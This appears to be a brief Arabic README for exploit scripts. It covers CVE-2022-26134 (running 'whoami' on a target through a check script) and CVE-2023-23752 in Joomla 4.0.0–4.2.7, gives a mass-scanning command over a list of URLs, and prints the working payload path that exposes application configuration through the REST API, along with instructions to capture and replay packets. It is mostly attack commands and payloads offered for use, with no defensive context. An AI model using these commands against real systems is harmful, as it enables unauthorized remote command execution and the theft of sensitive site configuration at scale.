
تثبيت مكتبات بايثون
pip install -r requirements.txt
التحقق من الثغرة
python3 CVE-2022-26134_check.py -u url -c whoami

المسح الجماعي
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
قم بالوصول إلى عنوان الثغرة، والتقط الحزم، وأعد إرسالها

في الإصدارات من 4.0.0 إلى 4.2.7 من Joomla! CMS، ونظرًا لعدم كفاية تقييد الوصول إلى نقاط نهاية خدمة الويب، قد يؤدي ذلك إلى وصول غير مصرح به إلى REST API، مما يتسبب في تسريب معلومات حساسة.